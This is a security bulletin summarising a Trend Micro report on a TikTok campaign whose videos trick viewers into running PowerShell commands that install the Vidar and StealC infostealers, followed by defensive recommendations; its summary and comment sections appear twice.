TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC Infostealers Instead
Summary:
Trend Micro researchers have identified a reportedly novel social engineering campaign that leverages the vast user base of TikTok to distribute a potentially high volume of the Vidar and StealC information-stealing malware. Threat actors are utilizing short videos, likely generated utilizing AI, to instruct users to execute PowerShell commands under the guise of software activation procedures. The step-by-step instructions provided in the video resemble the ClickFix instructions used to trick a victim. The reach of some of these videos is significant, with the most popular achieving over 20,000 likes, over 100 comments, and almost 430,000 views. Upon execution, the PowerShell commands download and execute a secondary payload, identified as either Vidar or StealC, after creating hidden directories and adding them to Windows Defender exclusions. The script then launches the malware executable as a hidden, elevated process. The malware then establishes persistence on the infected system by creating a registry key to execute the script at startup. The downloaded Vidar and StealC malware will then reach out to their C2 servers. Notably, the Vidar samples abuse legitimate services like Steam and Telegram to serve as Dead Drop Resolvers.
Security Officer Comments:
This TikTok-based campaign represents a concerning addition to the social engineering arsenal of tactics. These videos have achieved significant reach, with one instance garnering almost half a million views, 20,000 likes, and more than 100 comments, showcasing the threat actor’s ability to gain user trust and some high user interaction, which could potentially be indicators of widespread infection. The use of video content, particularly potentially AI-generated videos with seemingly legitimate instructions, lowers the barrier for less-skilled threat actors to engage a broad audience and bypass traditional web-based security measures. The reliance on verbal instructions within the video to execute these ClickFix-style “Windows + R” tactic to convince the victim to execute PowerShell commands is a clever evasion technique, as it minimizes the footprint of detectable malicious code directly on the platform where the phishing attempt begins. The significant reach afforded by TikTok's algorithms amplifies the potential impact, making it important for businesses to enhance their security awareness training, disable “Windows + R” if viable, and integrate social media threat intelligence feeds.
Suggested Corrections:
IOCs are available here, at the end of the blog post.
Trend Micro advises that traditional security controls that focus on malicious code detection, link scanning, and domain reputation are less effective against attacks that exploit user trust and obscure malicious intent. Security strategies must adopt a more holistic approach that includes social media monitoring, behavioral analysis, and targeted user education. Addressing these attack vectors proactively will reduce the risk of mass compromise and help users and businesses alike:
https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html
Trend Micro researchers have identified a reportedly novel social engineering campaign that leverages the vast user base of TikTok to distribute a potentially high volume of the Vidar and StealC information-stealing malware. Threat actors are utilizing short videos, likely generated utilizing AI, to instruct users to execute PowerShell commands under the guise of software activation procedures. The step-by-step instructions provided in the video resemble the ClickFix instructions used to trick a victim. The reach of some of these videos is significant, with the most popular achieving over 20,000 likes, over 100 comments, and almost 430,000 views. Upon execution, the PowerShell commands download and execute a secondary payload, identified as either Vidar or StealC, after creating hidden directories and adding them to Windows Defender exclusions. The script then launches the malware executable as a hidden, elevated process. The malware then establishes persistence on the infected system by creating a registry key to execute the script at startup. The downloaded Vidar and StealC malware will then reach out to their C2 servers. Notably, the Vidar samples abuse legitimate services like Steam and Telegram to serve as Dead Drop Resolvers.
Security Officer Comments:
This TikTok-based campaign represents a concerning addition to the social engineering arsenal of tactics. These videos have achieved significant reach, with one instance garnering almost half a million views, 20,000 likes, and more than 100 comments, showcasing the threat actor’s ability to gain user trust and some high user interaction, which could potentially be indicators of widespread infection. The use of video content, particularly potentially AI-generated videos with seemingly legitimate instructions, lowers the barrier for less-skilled threat actors to engage a broad audience and bypass traditional web-based security measures. The reliance on verbal instructions within the video to execute these ClickFix-style “Windows + R” tactic to convince the victim to execute PowerShell commands is a clever evasion technique, as it minimizes the footprint of detectable malicious code directly on the platform where the phishing attempt begins. The significant reach afforded by TikTok's algorithms amplifies the potential impact, making it important for businesses to enhance their security awareness training, disable “Windows + R” if viable, and integrate social media threat intelligence feeds.
Suggested Corrections:
IOCs are available here, at the end of the blog post.
Trend Micro advises that traditional security controls that focus on malicious code detection, link scanning, and domain reputation are less effective against attacks that exploit user trust and obscure malicious intent. Security strategies must adopt a more holistic approach that includes social media monitoring, behavioral analysis, and targeted user education. Addressing these attack vectors proactively will reduce the risk of mass compromise and help users and businesses alike:
- Expanding threat monitoring to social media platforms: Integrating social media threat intelligence feeds can help businesses track emerging campaigns and identify high-engagement content linked to unusual or technical instructions. Since threat actors often reuse content across multiple platforms, correlating posts across social media networks can reveal interconnected campaigns and even emerging threats.
- Incorporating behavioral analysis: With no malicious code embedded, detecting malicious actions relies on monitoring user behavior. This includes identifying anomalous activities, such as the execution of system utilities like PowerShell. Red flags also include unexpected command execution, direct downloads from unknown URLs, unauthorized creation of folders, or modifications in security settings.
- Strengthening social engineering awareness: Employee training must evolve beyond phishing to address tactics that exploit visual and auditory content on social media. Users should be encouraged to scrutinize unsolicited technical instructions, verify the legitimacy of video sources, and report suspicious content, whether on social media, messaging apps, or email. After all, if an offer seems too good to be true, it probably is.
https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html